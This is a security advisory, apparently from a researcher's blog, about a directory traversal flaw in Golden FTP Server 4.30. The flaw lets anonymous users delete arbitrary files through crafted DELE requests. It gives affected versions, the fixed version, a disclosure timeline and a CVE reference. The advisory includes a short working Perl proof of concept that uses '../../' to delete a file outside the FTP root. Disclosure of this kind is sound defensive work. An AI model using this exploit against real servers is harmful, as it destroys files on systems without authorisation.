blog.sat0ri.com

Summary

An input validation error has been discovered in Golden FTP Server, which can be exploited by malicious, anonymous individuals to delete arbitrary files.

The vulnerability is caused by an error in the way FTP “DELE” requests are handled. This can be exploited to escape the FTP root and delete arbitrary files on the affected system by using the “../” character sequence.

Successful exploitation of this vulnerability requires that the “Enable full control” option is enabled.

Affected Versions

This vulnerability is confirmed in the following versions:

• Golden FTP Server 4.30 Free
• Golden FTP Server 4.30 Professional

Other versions may also be afected.

Exploit Example

use strict;
use Net::FTP

my $ftp = Net::FTP->new(“192.168.1.35″, Debug => 1) || die $@;

$ftp->login(“anonymous”, ‘anonymous@local.host’) || die $ftp->message;

# The FTP root is, via the configuration, set to C:\ftp\public
$ftp->cwd(“/public/”) || die $ftp->message;

# This deletes the file C:\bollocks.txt
$ftp->delete(“../../bollocks.txt”);

$ftp->quit;

$ftp = undef;

Resolution

Update to version 4.70 Free or Professional.

Time-line

• Vulnerability identified: 29.10.09
• Vendor informed: 11.11.09
• Vendor fix: 17.02.10

References

• SATA291009.PDF (68)
• Vendor
• CVE-2009-4194